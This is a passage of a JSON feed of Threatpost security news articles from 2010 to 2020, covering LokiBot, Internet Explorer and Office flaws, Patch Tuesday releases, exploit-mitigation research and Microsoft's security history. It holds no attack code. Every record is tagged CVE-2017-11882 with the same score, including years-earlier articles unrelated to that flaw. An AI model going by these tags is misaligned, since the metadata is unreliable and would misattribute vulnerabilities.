email.\n\nTo protect themselves, CISA said that companies should keep patches up to date, disable file- and printer-sharing services if not necessary, enforce multi-factor authentication and strong passwords, enable personal firewalls and scanning of downloads, and implement user education on how to exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known.\n", "cvss3": {}, "published": "2020-09-23T15:27:18", "type": "threatpost", "title": "CISA: LokiBot Stealer Storms Into a Resurgence", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2020-09-23T15:27:18", "id": "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "href": "https://threatpost.com/cisa-lokibot-stealer-resurgence/159495/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:08:47", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054752/ie_micro_patch1.jpg)](<https://threatpost.com/attacks-continuing-against-ie-flaw-microsoft-preps-patch-011810/>)Microsoft officials said on Sunday that they are continuing to investigate the attacks that are exploiting the unpatched flaw in Internet Explorer, but that the attacks right now are limited to specifically targeted activity against enterprise networks.\n\nThe company said that it doesn\u2019t look like any of the attacks are being targeted at consumers, and that they are only effective against machines running IE 6, which doesn\u2019t include many of the advanced memory protections that are part of IE7 and IE8. [Microsoft is recommending](<http://blogs.technet.com/msrc/>) that customers running older versions of Windows XP and IE6 upgrade in order to take advantage of those memory protections.\n\nThat said, we remain vigilant about this threat evolving and want to be \nsure our customers take appropriate action to protect themselves. That \nis why we continue to recommend that customers using IE6 or IE7, [upgrade to IE8](<http://www.microsoft.com/downloads/details.aspx?FamilyID=68C48DAD-BC34-40BE-8D85-6BB4F56F5110&displaylang=en>) \nas soon as possible to benefit from the improved security protections \nit offers. Customers who are using Windows XP SP2 should be sure to \nupgrade to both IE8 and enable Data Execution Protection (DEP), or [upgrade to Windows XP SP3](<http://support.microsoft.com/kb/322389>) \nwhich enables DEP by default, as soon as possible. Additionally \ncustomers should consider implementing the workarounds and mitigations \nprovided in the Security Advisory.\n\nMicrosoft\u2019s next scheduled patch release isn\u2019t until mid-February, but given that there is public exploit code available and that the vulnerability has been used in known attacks, the company could release an emergency out-of-band patch before then.\n", "cvss3": {}, "published": "2010-01-18T14:11:24", "type": "threatpost", "title": "Attacks Continuing Against IE Flaw as Microsoft Preps Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:42:32", "id": "THREATPOST:A2FCDF5F534EC09A258F3193FDEA41A8", "href": "https://threatpost.com/attacks-continuing-against-ie-flaw-microsoft-preps-patch-011810/73380/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:09", "description": "Microsoft launched a new transparency website this week that bundles reports detailing requests for data the company has received, including those from law enforcement, the government, and elsewhere.\n\nThe page, which Microsoft is calling its [Transparency Hub](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/>), is somewhat similar to [what Apple did last month](<https://threatpost.com/apple-goes-all-in-on-privacy/114846/>) when it looped all of its transparency reports together on one page.\n\nWhile Microsoft has issued transparency reports regarding requests from law enforcement and the U.S. government in the past, this is the first time it\u2019s broken down requests the company has received from other parties to outright remove content on sites such as its search engine Bing.\n\nLike the other two reports, the \u201c[Content Removal Requests Report](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/crrr/>)\u201d pertains to requests from the first six months of the calendar year. The main difference is this report mostly culls information on requests from other governments, requests from European residents citing a special European Court of Justice ruling, and requests from copyright owners claiming their work was infringed.\n\nAccording to the report, China far and away had the most requests for content to be removed, with 165 requests filed compared to 11 from the United States, and 10 from Austria, Germany, Russia, and the U.K. combined. The report doesn\u2019t specify exactly what the content was or where it was located, but claims the numbers are from Microsoft entities like Bing, OneDrive, and MSN.\n\nThere were many more requests to remove copyrighted information, just north of one million, according to Microsoft. In this case, it was usually URLs that were being shown in Bing searches that contained copyrighted material. Microsoft claims it complied with 92 percent of requests. Since this is an inaugural report however, there are no statistics from last year to compare the numbers to.\n\nThe company received 3,546 requests from European residents to remove results for queries in Bing that included their name. A rule passed last year called the \u2018Right To Be Forgotten\u2019 rule allows users to ask their name be removed if the results were inadequate, inaccurate or no longer relevant. Microsoft complied with 50 percent of those requests.\n\nAs far as law enforcement requests, Microsoft received 35,228, a slight uptick from the second half of 2014 when it received 31,002. The report claims only three percent of requests it received led to the disclosure of content customers created, shared or stored on its services. The company rejected 12 percent of requests, up from 7.5 percent in the second half of last year.\n\nThe company, as it\u2019s done for the past several years, also claims it received somewhere [between zero and 999 National Security Letters](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/fisa/>). The government only permits companies to disclose requests in bands of 1000, which explains the vague number.\n\nThe company got permission to start sharing information pertaining to legal demands they receive in early 2014 but has been posting the reports pertaining to law enforcement twice a year [since 2013](<https://threatpost.com/microsoft-transparency-report-shows-company-supplied-user-content-22-cases-032113/77653/>), largely in response to a growing demand for transparency from big data companies in the post-Snowden world.\n", "cvss3": {}, "published": "2015-10-15T15:32:57", "type": "threatpost", "title": "Latest Microsoft Transparency Report Details Content Removal Requests", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-15T19:32:57", "id": "THREATPOST:6232FE8F8C59D8BBBD6CD0EAAD3D4AA3", "href": "https://threatpost.com/latest-microsoft-transparency-report-details-content-removal-requests/115062/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:15", "description": "Microsoft today re-released [security bulletin MS14-045](<http://threatpost.com/microsoft-yet-to-deliver-fix-for-faulty-patch-tuesday-update/107809>), which was pulled shortly after the [August Patch Tuesday updates](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) because a number of users reported crashes and blue screens. The patch was removed from Windows Update on Aug. 15, three days after it was released as part of Microsoft\u2019s monthly patch cycle.\n\n\u201cAs soon as we became aware of some problems, we began a review and then immediately pulled the problematic updates, making these unavailable to download,\u201d said Tracey Pretorius, director, Trustworthy Computing at Microsoft. \u201cWe then began working on a plan to rerelease the affected updates.\u201d\n\n[MS14-045](<https://technet.microsoft.com/en-us/library/security/ms14-045.aspx>) patched vulnerabilities in kernel-mode drivers that were rated important by Microsoft because they require valid credentials and local access in order to exploit. Successful exploits could have led to an elevation of privileges on a compromised Windows machine.\n\nMicrosoft said at the time that a font issue patched in the update was the culprit causing the reported system crashes. Microsoft said that only a small number of computers were affected. There were other issues with the bulletin, the most serious causing systems to crash and render a 0x50 Stop error message after installation. Users were also seeing \u201cFile in Use\u201d error messages because of the font issue in question.\n\nThe bugs affect Windows systems all the way back to Windows Server 2003 and all supported desktop versions of Windows. Windows Update users will automatically get the patch, otherwise, Microsoft urges users to install the update.\n\nThis month\u2019s update had a distinct IE feel to them with another cumulative update patching 26 vulnerabilities in Microsoft\u2019s flagship browser, including a publicly reported vulnerability that is likely being exploited in the wild. All 26 vulnerabilities were rated critical and could be remotely exploited.\n\nThe update came on the heels of an announcement at the start of the month alerting users that Microsoft would, in 18 months, no longer support older version of the browser. With a rash of zero-days and high profile exploits targeting older versions of IE, such as 6, 7 and 8, Microsoft made it clear that users should use only a current browser with modern memory exploit mitigations built in.\n\nMicrosoft also announced it would be [blocking older ActiveX controls in Internet Explorer](<http://threatpost.com/ie-to-block-older-activex-controls-starting-with-java/107672>), starting with out of date versions of Java, another platform heavily targeted by hackers.\n\nThe next scheduled Patch Tuesday security bulletins release is set for Sept. 9.\n", "cvss3": {}, "published": "2014-08-27T14:08:58", "type": "threatpost", "title": "Microsoft Re-Releases Broken Security Patch MS14-045", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-04T12:04:44", "id": "THREATPOST:2DAD0426512A1257D3D75569F282640E", "href": "https://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:13", "description": "Microsoft today announced a relatively light load of patches will be delivered on [Patch Tuesday](<https://technet.microsoft.com/library/security/ms14-sep>) next week, along with some numbers that demonstrate public vulnerability disclosures continue to rise.\n\nFour security bulletins, one rated critical, are scheduled to be released next Tuesday. In what\u2019s becoming customary for Patch Tuesday, administrators can expect another cumulative patch roll-up for Internet Explorer addressing a number of remote code execution vulnerabilities in the browser.\n\nThe three remaining bulletins, all rated important by Microsoft, include a privilege-escalation bug in Windows 8 and 8.1 as well as Windows Server 2012 and RT. Another bulletin patches a .NET denial-of-service vulnerability in Windows Server 2003, 2008 and 2012, and on the client side OS back to Vista.\n\nAnother denial-of-service bug is expected to be patched in Microsoft\u2019s Lync instant messaging and collaboration software.\n\n\u201cThe few number of patches expected out next week doesn\u2019t mean you can take a pass on patching this month.\u201d\n\n\u201cThe few number of patches expected out next week doesn\u2019t mean you can take a pass on patching this month however,\u201d cautions Russ Ernst, director, product management, Lumension.\n\nLast month, Microsoft patched IE with a [cumulative update that addressed 26 vulnerabilities](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) including one exploited in the wild. The news out of last month\u2019s batch of bulletins, however, was a faulty patch, MS14-045, that was [re-released after users complained of crashes and blue screens of death](<http://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953>). The bulletin addressed vulnerabilities in kernel-mode drivers, and Microsoft blamed font issues for the system crashes.\n\nIn the meantime, Microsoft points out in a separate announcement that public vulnerability disclosures are approaching levels matching the first half of 2012, and that more than 4,000 disclosures have been made annually since the start of 2011. That number is still well shy of the 7,000 disclosed in the 2006-2007 timeframe, Microsoft said.\n\nFor the last half of 2013, for example, disclosures across the industry were up 6.5 percent from the start of the year, and up 12.6 percent from the second half of 2012. The severity of disclosures, however, is down. A little more than six percent of bugs scored 9.9 or greater on the CVSS standard in the second half of 2013, down from almost 13 percent in the first six months of the year.\n\n\u201cVulnerability complexity is an important factor to consider in determining the magnitude of the threat that a vulnerability poses,\u201d wrote Microsoft\u2019s Tim Rains in the [report](<http://blogs.technet.com/b/security/archive/2014/09/03/industry-vulnerability-disclosures-trending-up.aspx>). \u201cA high-severity vulnerability that can only be exploited under very specific and rare circumstances might require less immediate attention than a lower-severity vulnerability that can be exploited more easily.\u201d\n\nDisclosures of medium- and low-complexity bugs, posing the highest risk to users, far outnumber disclosures of high complexity vulnerabilities, Microsoft said.\n\nThird-party applications such as media players or Web components such as Flash or Java continue to thrive, with disclosures up 34.4 percent in the latter half of 2013 and accounted for 58 percent of disclosures during that timeframe. Operating system vulnerability disclosures, meanwhile, were down 46 percent and accounted for 15 percent of total disclosures. Browser bugs, meanwhile, were also down 28 percent and made up 10 percent of overall disclosures.\n\nMicrosoft also examined disclosures for its products, 174 in the second half of 2013, up 2 percent from the first six months. Microsoft disclosures account for 7 percent of industry disclosures, down slightly from the start of the year.\n", "cvss3": {}, "published": "2014-09-04T15:07:28", "type": "threatpost", "title": "September 2014 Microsoft Patch Tuesday advance notification", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-04T19:07:28", "id": "THREATPOST:29E9543F6EC7903A34D286C6F4391368", "href": "https://threatpost.com/patch-tuesday-includes-another-ie-update-vuln-disclosures-up/108098/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:41", "description": "One zero-day down, one to go.\n\nAs expected, Microsoft did today patch a zero-day in its GDI+ graphics component ([MS13-096](<https://technet.microsoft.com/en-us/security/bulletin/ms13-096>)) reported more than a month ago after exploits were spotted in the wild. The fix was one of 11 security bulletins\u2014five critical\u2014released as part of the December 2013 Patch Tuesday security updates.\n\nAnother zero-day, one affecting only Windows XP users, still remains [unpatched despite active exploits](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) targeting the vulnerability, which is found in the NDProxy driver that manages the Microsoft Telephony API. The attacks depend on a second vulnerability to deliver the exploit against an XP machine. Microsoft recommends turning off NDProxy as a mitigation until a patch is available.\n\nWhile there were five critical bulletins released today, experts urge IT administrators to also prioritize an ASLR bypass vulnerability that was patched today and rated \u201cimportant\u201d by Microsoft.\n\n[MS13-106](<https://technet.microsoft.com/en-us/security/bulletin/ms13-106>) takes care of an Office vulnerability that is being exploited in the wild, Microsoft said. Attackers hosting a malicious exploit online can trigger the vulnerability in the hxds.dll that enables a bypass of ASLR or Address Space Layout Randomization, a security feature in Windows that mitigates memory corruption exploits.\n\n\u201cThe vulnerability could allow security feature bypass if a user views a specially crafted webpage in a web browser capable of instantiating COM components, such as Internet Explorer,\u201d Microsoft said in its advisory. \u201cThe security feature bypass by itself does not allow arbitrary code execution. However, an attacker could use this ASLR bypass vulnerability in conjunction with another vulnerability, such as a remote code execution vulnerability that could take advantage of the ASLR bypass to run arbitrary code.\u201d\n\nASLR bypasses have been more frequent this year, and have been rolled into a number of exploit kits. Introduced in Windows Vista, ASLR hampers the reliability of exploits by negating an attacker\u2019s ability to predict where machine instructions will exist in memory. ASLR is particularly effective against buffer overflow attacks.\n\n\u201cThis particular library, hxds.dll, has been used by numerous attacks in the wild with great success because it can be easily loaded into memory from a web page by using the \u2018ms-help:\u2019 protocol handler,\u201d said Craig Young, security researcher at Tripwire. \u201cUntil today, the only options that protect against this were the removal of Office 2007/2010 installs or enabling Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET).\u201d\n\nAdmins will also have to contend with yet another cumulative update for Internet Explorer. [MS13-097](<https://technet.microsoft.com/en-us/security/bulletin/ms13-097>) patches a number of remote code execution vulnerabilities in the browser, all the way back to IE 6. IE has been patched almost monthly this year and has been front and center in numerous targeted attacks.\n\nMicrosoft also patched a critical bug in its Authenticode signing algorithm that is being exploited. [MS13-098](<https://technet.microsoft.com/en-us/security/bulletin/ms13-098>) allows remote code execution if a user is enticed to run an application that contains a malicious and signed portable execution file. The patch modifies how the WinVerifyTrust function handles Windows Authenticode signature verification for PE files, Microsoft said.\n\n\u201cAttackers have been abusing installers from legitimate software makers to install malware. These installers are configured in a way to dynamically download code extensions that are not checked for correct signatures, and attackers have found a way to piggyback on that mechanism,\u201d said Qualys CTO Wolfgang Kandek, who added that the patch prepares the system for a more stringent integrity check that prevents such exploits. Microsoft also issued a separate [security advisory](<http://technet.microsoft.com/en-us/security/advisory/2915720>) regarding the Authenticode patch, that after June 10, 2014 it will no longer recognize non-compliant signed binaries.\n\nThe two remaining critical bulletins, [MS13-099](<https://technet.microsoft.com/en-us/security/bulletin/ms13-099>) and [MS13-105](<https://technet.microsoft.com/en-us/security/bulletin/ms13-105>), patch remote code execution vulnerabilities in Microsoft Scripting Runtime Object Library and Exchange Server respectively. Three of the four Exchange vulnerabilities addressed in the bulletin, it\u2019s worth noting, are publicly disclosed. The most serious is in the WebReady Document Viewing and DLP features of Exchange Server, Microsoft said.\n\nThe remaining bulletins\u2014rated \u201cimportant\u201d\u2014address one remote code execution bug, three privilege escalation issues and an information disclosure vulnerability:\n\n * [MS13-100](<https://technet.microsoft.com/en-us/security/bulletin/ms13-100>) patches a remote code execution vulnerability in Microsoft SharePoint Server; an attacker would have to be authenticated to the server to exploit the vulnerability. A successful exploit would enable an attacker to run code in the context of the W3WP service account on the SharePoint site.\n * [MS13-101](<https://technet.microsoft.com/en-us/security/bulletin/ms13-101>) fixes a privilege elevation issue in Windows Kernel-Mode Drivers. An attacker would have to log onto a system and run a malicious application to exploit the bug.\n * [MS13-102](<https://technet.microsoft.com/en-us/security/bulletin/ms13-102>) is a patch for a vulnerability in the LRPC Client that would allow an attacker to elevate their privileges on an LRPC server. Doing so would allow an attacker to install programs, manipulate data or create accounts. Valid credentials are needed to exploit this bug.\n * [MS13-103](<https://technet.microsoft.com/en-us/security/bulletin/ms13-103>) patches a vulnerability in ASP.NET SignalIR that could elevate an attacker\u2019s privileges if they are able to reflect Javascript back to the user\u2019s browser. Microsoft also issued an [advisory](<http://technet.microsoft.com/en-us/security/advisory/2905247>) for a flaw in ASP.NET view state that exists when Machine Authentication Code (MAC) validation is disabled through configuration settings.\n * [MS13-104](<https://technet.microsoft.com/en-us/security/bulletin/ms13-104>) is a fix for an information disclosure vulnerability in Microsoft Office. Successful exploits could give an attacker access tokens used to authenticate a user on a SharePoint or Office server site.\n\nMicrosoft also sent out an [advisory](<http://technet.microsoft.com/en-us/security/advisory/2871690>) that revokes the digital signatures for nine private, third-party UEFI modules for Windows 8 and Windows Server 2012 machines. These modules would be loaded during a UEFI Secure Boot, if it is enabled.\n", "cvss3": {}, "published": "2013-12-10T16:09:59", "type": "threatpost", "title": "December 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-12-12T20:37:55", "id": "THREATPOST:DDDE126E49EC98A6A15655F564E25620", "href": "https://threatpost.com/microsoft-patches-gdi-zero-day-experts-urge-close-look-at-important-aslr-bypass-patch/103157/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:58", "description": "LAS VEGAS \u2014 It wasn\u2019t long ago that ROP, or return-oriented programming, was a hacker\u2019s best friend when it came to bypassing mitigations against memory-based attacks such as DEP and ASLR.\n\nROP, however, is so 2005. In the last couple of years, researchers and attackers have figured out how to bypass popular tools such as Microsoft\u2019s Enhanced Mitigation Experience Toolkit (EMET), without the need for ROP. Exploit kits, for example have integrated attacks that have moved up the exploitation stack closer to memory and before code is written to disk. All the while, defenders still focus on post-exploitation techniques (i.e., ROP) that are obsolete today.\n\nThis week at Black Hat USA 2016 in Las Vegas, researchers at Endgame are expected to introduce new defensive techniques that could level the playing field. Their approach is called Hardware Assisted Control Flow Integrity (HA-CFI), which leverages features in the micro-architecture of Intel processors, such as the performance monitoring unit (PMU), for security.\n\n\u201cDuring the last two years, academics have been using it for security purposes,\u201d said Cody Pierce, Endgame director of vulnerability research. \u201cWe\u2019re continuing the idea of using hardware features to implement a security check. That\u2019s where CFI comes in and monitors the PMU to get real-time views into protected processes.\u201d\n\nWhere tools such as EMET catch attacks in the post-exploitation stage of an attack, HA-CFI operates in the exploitation stage before bypasses happen.\n\n\u201cIt\u2019s generic in the fact it has no knowledge of exploit techniques, and doesn\u2019t know about ROP; the system is autonomous,\u201d Pierce said. \u201cWhat it\u2019s looking for is an abnormal change in execution. Usually this is the absolute first step of exploits. They will redirect execution from normal- to attacker-controlled execution. That\u2019s a very specific thing that we\u2019re hoping to pick up on.\n\n\u201cAn analogy to malware would be that you would want to pick up detection of malware before it\u2019s written to disk,\u201d Pierce said. \u201cYou don\u2019t want to wait until it runs and sets up persistence and backdoors.\u201d\n\nMicrosoft implemented [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\$v=vs.85\$.aspx>) starting with Visual Studio 2015 and it runs only on x86 and x64 releases on Windows 8.1 and Windows 10. CFG restricts where applications can execute code from, Microsoft said, cutting into the effectiveness of code execution attacks and buffer overflow exploits. Pierce said CFG has its limitations, specifically that can run only on the latest compilers and OSes, requiring organizations to recompile in order to run it. HA-CFI would operate at runtime, and its biggest limitation, Pierce said, is a performance overhead that could be 3x higher than Microsoft\u2019s requiring organizations to consider that tradeoff when protecting commonly exploited apps such as browsers, Office and Flash.\n\nAs for ROP being on life support, a number of prominent researchers have been developing new approaches to mitigation bypasses that are putting those attacks out to pasture. [Yang Yu](<https://threatpost.com/latest-microsoft-100000-bounty-winner-bypasses-aslr-dep-mitigations/104328/>), a two-time [Microsoft bounty winner](<https://threatpost.com/patched-badtunnel-windows-bug-has-extensive-impact/118697/>), really got the ball rolling with a 2014 Black Hat talk called [Write Once, Pwn Anywhere](<https://www.blackhat.com/docs/us-14/materials/us-14-Yu-Write-Once-Pwn-Anywhere.pdf>) where he was able to change a value in memory that allowed his attack to bypass native restrictions and execute commands sans ROP. The Hacking Team dump of last summer also showed that other professionals had [moved beyond ROP](<https://threatpost.com/curious-tale-of-a-microsoft-silverlight-zero-day/115873/>) with a slate of attacks that [bypass EMET](<https://threatpost.com/bypass-developed-for-microsoft-memory-protection-control-flow-guard/114768/>) and other mitigations.\n\n\u201cFrom an exploit writer\u2019s perspective, you don\u2019t want to have to do more work than necessary, and we\u2019ve learned ROP is a little unnecessary,\u201d Pierce said, adding that some of these techniques that have become public in the last 12-18 months have made it easier to develop more powerful exploits.\n\n\u201cWith ROP, usually some work has to be done to get all versions of apps you want to exploit,\u201d Pierce said. \u201cThese advanced approaches eliminate that need.\u201d\n", "cvss3": {}, "published": "2016-08-01T13:00:22", "type": "threatpost", "title": "HA-CFI Technique Checks Mitigation Bypasses Earlier", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-07-29T19:00:17", "id": "THREATPOST:519EDC580FCA347C035738F51DB2ABE3", "href": "https://threatpost.com/new-technique-checks-mitigation-bypasses-earlier/119568/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:00", "description": "[![Microsoft](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065032/micro_twc_0.jpg)](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/>)Ten years.\n\nThat\u2019s a really long time. Think about what you were doing 10 years ago. Can you even remember? Maybe you were in college or high school, or cripes, even grade school. Or maybe you were working in security already, trying to figure out why your network kept getting overrun by viruses and attackers. \nYou know what Microsoft was doing 10 years ago?\n\nMaking really, really buggy software and watching its customers get owned left and right.\n\nThe early part of the 2000s was not a good time for the folks in Redmond. The company was taking a serious public beating for the instability and insecurity of its software, especially Internet Explorer, Outlook and Windows. VB script viruses such as I Love You, Melissa and others were running wild and large enterprise customers were screaming and pounding their shoes on the table and demanding answers from Microsoft.\n\nAnd Microsoft didn\u2019t have any.\n\nThe company had spent the last few years defending itself against the [Department of Justice\u2019s antitrust suit](<https://en.wikipedia.org/wiki/United_States_v._Microsoft>) centered on its Windows-IE monopoly. Much of its energy and resources\u2013not to mention money\u2013were devoted to the case, which Microsoft ultimately lost. Then, when the dust settled and company officials began looking around to see what had been going on while they were buried in federal courtrooms for three years, what they found was something like the information age version of the angry mob of villagers with torches and pitchforks.\n\nTo say that customers were not happy would be like saying Bill Gates has some money tucked away.\n\nAs it turned out, it was Gates himself who would provide the spark that would ultimately light a fire under the thousands of developers, product managers and engineers in Redmond to make security not just a priority, but the priority.\n\nThe email that Gates sent on Jan. 15, 2002, has come to be known as the [Trustworthy Computing memo](<https://threatpost.com/what-if-bill-gates-never-wrote-trustworthy-computing-memo-022410/>) and it is often pointed to as the origin of any sort of security awareness at Microsoft. But that\u2019s not really the case. [Gates\u2019s email](<http://www.computerbytesman.com/security/billsmemo.htm>) may have been the first real public expression of that sentiment, but some people inside the company had been thinking along those lines for some time.\n\nThe first step is admitting you have a problem, of course. But then you have to do something about it.\n\nA few months before Gates sent his email, Microsoft held a small conference in Redmond on what it then called trusted computing, bringing in a series of software security experts to discuss the principles and concepts that are the foundation of building more secure software. There were a few reporters there and some security researchers and the fascinating thing about it was that it was not Microsoft officials preaching their ideas to the audience, but trying to learn from the assembled experts. Odd.\n\nAnd well before Gates pushed the button on his email, there were people inside the company talking about the same concepts\u2013reliability, robustness and resistance to attack\u2013and advocating that developers build their applications around them.\n\nIn the months following the publication of Gates\u2019s email, Microsoft began a number of painful internal changes designed to refocus its developers around the idea of building secure software. Until then, the ship-or-die mentality had reigned supreme inside the company and features and functionality were the two-headed god that every developer worshipped. The chances of a team stoppping shipment because of a security problem at that point were zero point zero zero.\n\nBut within a few months of Gates\u2019s memo, that\u2019s exactly what happened. The company stopped development on several major products in order to put their developers through security training. Since then, the company has developed and released a slew of software security tools and methodologies and somehow turned Microsoft from the butt of every joke in the industry into an organization that\u2019s seen as doing it the right way.\n\nBut it wasn\u2019t just Microsoft that began changing in those days. The turnaround initiated by the company and Gates also took hold in the wider software industry and other industries, albeit much more slowly and spottily. After Microsoft\u2019s public declaration of the need for change, the sentiment began to spread to some of its larger customers. Then, more and more financial services firms, insurance companies, telecoms and other companies got on board, starting their own software security programs.\n\nBy the middle to latter part of the decade, Microsoft not only wasn\u2019t the object of every joke in the security community, it was being used as an example of how to do things right, how to get your collective stuff together and fix what\u2019s broken.\n\nSo, what Gates\u2019s memo turned out to be was not just a directive for Microsoft developers, but a call to arms for the rest of the industry, as well. It was by no means the beginning of the software security movement. Not even close. But it was, in fact, the beginning of something different and perhaps more important: widespread acceptance that software security needed to be a top priority.\n\nEven for Microsoft.\n\n*Microsoft homepage image via [SeattleClouds.com](<http://www.flickr.com/photos/42106306@N00/>)\u2018s Flickr photostream\n", "cvss3": {}, "published": "2012-01-12T14:43:00", "type": "threatpost", "title": "Ten Years After Gates's Memo, Effects Still Being Felt", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:00", "id": "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "href": "https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/76089/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:23", "description": "Microsoft\u2019s problems with [Token Kidnapping](<http://www.argeniss.com/research/TokenKidnapping.pdf>) [.pdf] on the Windows platform aren\u2019t going away anytime soon.\n\nMore than a year after Microsoft issued a [patch](<http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx>) to cover privilege escalation issues that could lead to complete system takeover, a security researcher plans to use the Black Hat conference spotlight to expose new design mistakes and security issues that can be exploited to elevate privileges on all Windows versions including the brand new Windows 2008 R2 and Windows 7.\n\nCesar Cerrudo, founder and CEO of Argeniss, a security consultancy firm based in Argentina, first reported the token kidnapping hiccup to Microsoft in 2008 and after waiting in vain for a patch, he released the details during the [Month of Kernel Bugs](<http://projects.info-pull.com/mokb/MOKB-06-11-2006.html>) project.\n\nThe flaw would eventually be [exploited in active attacks](<http://www.zdnet.com/blog/security/one-year-old-unpatched-windows-token-kidnapping-under-attack/2894>), leading to a mad scramble at Redmond to come up with a fix and a subsequent [disclosure flap](<http://www.zdnet.com/blog/security/responsible-disclosure-the-microsoft-way/157>) that exposed Microsoft as the irresponsible party.\n\nThis year, Cerrudo plans a new talk titled \u201cToken Kidnapping\u2019s Revenge\u201d where he will discuss how attackers can even bypass certain Windows services protections.\n\nIn an interview with Threatpost, Cerrudo said the presentation will discuss about a half-dozen vulnerabilities in all Windows versions from XP to Windows 7 that can be exploited to elevate privileges by any user with impersonation rights. \n\nThe explanation:\n\n_Most Windows services accounts have impersonation rights. Because impersonation rights are needed these are not critical, high risk vulnerabilities, regularWindows users can\u2019t exploit them. Some applications are more susceptible to exploitation of these vulnerabilities than others, for instance, if you can upload ASP web pages with exploit code to a MS Internet Information Server (IIS) 6, 7 or 7.5 running in default configuration you will be able to fully compromise the Windows server. _\n\nFor example, if you are an SQL Server administrator (which is not a Windows administrator) you can exploit these vulnerabilities from SQL Server and fully compromise the Windows server. \n\nCerrudo said the vulnerabilities can be exploited to bypass new Windows services protection to help in post-exploitation scenarios too where an attacker is able to run code after exploiting a vulnerability in a Windows service but he is not able to compromise the whole system due to these protections.\n\nOne of the issues Cerrudo plans to present at Black Hat even allows him to bypass one of the Microsoft\u2019s fixes for previous Token Kidnapping vulnerabilities on Windows 2003.\n\n[block:block=47]\n\n\u201cMicrosoft is aware of these issues (and other local privilege elevation issue that can be exploited by any user but I won\u2019t be talking about it before the fix) and they will be releasing fixes and advisories in August,\u201d Cerrudo explained.\n\nThe researcher also plans to release two exploits (called Chimichurri and Churraskito) for IIS and SQL Server. These exploits could work on other services too with some minor modifications, he said.\n\n\u201cThe presentation is not only about the vulnerabilities and the exploits. I will be showing step by step how I found the vulnerabilities, with what tools and techniques, so participants can learn and walk away knowing how to find these kind of vulnerabilities by themselves,\u201d Cerrudo added.\n", "cvss3": {}, "published": "2010-07-16T15:42:06", "type": "threatpost", "title": "MS Windows Token Kidnapping Problems Resurface", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:32", "id": "THREATPOST:DC3489917B7B9C6C1824FB61C05E82CD", "href": "https://threatpost.com/ms-windows-token-kidnapping-problems-resurface-071610/74221/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:38", "description": "****[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054258/stephen_toulouse1.jpg)](<https://threatpost.com/stephen-toulouse-msrc-evolution-security-microsoft-and-securing-xbox-live-091009/>)Dennis Fisher talks with Stephen Toulouse, director of policy and enforcement for Xbox Live at Microsoft, about his years at the Microsoft Security Response Center, the evolution of security at Microsoft and the joy and pain of being the bad guy on Xbox Live.\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_301.mp3>)\n\nSubscribe to the Digital Underground podcast on 